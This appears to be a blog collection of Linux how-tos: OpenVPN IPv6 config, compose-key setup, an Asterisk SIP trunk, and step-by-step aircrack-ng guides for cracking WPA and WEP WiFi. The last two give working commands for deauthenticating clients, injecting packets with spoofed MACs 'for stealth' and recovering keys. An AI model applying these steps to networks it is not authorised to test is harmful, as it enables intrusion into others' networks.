OpenVPN – IPv6 with tun device

Note: IPv6 is not supported using OpenVPN on Debian Squeeze (stable). The version used by Debian Wheezy (testing) supports IPv6.

Network setup:
- 192.168.1.0/24 - Local IPv4 network
- 2001:412:abcd::/48 - Local IPv6 network
- 192.168.2.0/24 - Tunnel IPv4 network
- 2001:412:abcd:2::/64 - Tunnel IPv6 network

I have included only the sections of config files which need ammending to enable IPv6 over OpenVPN.

Client Config
# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun
# enable ipv6
tun-ipv6

Server Config
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun0
# Enable TUN IPv6 module
tun-ipv6

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 192.168.2.0 255.255.255.0
server-ipv6 2001:412:abcd:2::/64

# Push routes to the client to allow it
# to reach other private subnets behind
# the server. Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.1.0 255.255.255.0"
push "route-ipv6 2001:412:abcd::/48

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"

# Enable to make openvpn the default route for ipv6 connectivity?
;push "route-ipv6 2000::/3"

Enabling compose key to type unicode on Linux

The compose key may be used to type unicode characters easily on Linux systems…

All of these commands should be executed as a normal user, no root access required:

  1. Identify the key you want to use as your compose key, I use the ‘Windows’ key:
    • Run the application xev
    • Press the key you want to use as your compose key
    • Note down the keycode value (my Windows key identifies as keycode=133)
  2. Edit the file ~/.Xmodmap and insert the line
    keycode 133 = Multi_key
  3. Run xmodmap ~/.Xmodmap

Restart X and you will be able to use unicode:
<Compose key> + " + u = ü
<Compose key> + ' + e = é
<Compose key> + o + r = ®
<Compose key> + - + y = ¥

and many more…

(Tested and in current use on Debian Wheezy)

SIP Trunking between Asterisk 1.4 and Cisco CUBE

As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.

In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)

In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)

The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
  10. Stop monitor mode: airmon-ng stop mon0

Breaking WEP Encryption

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0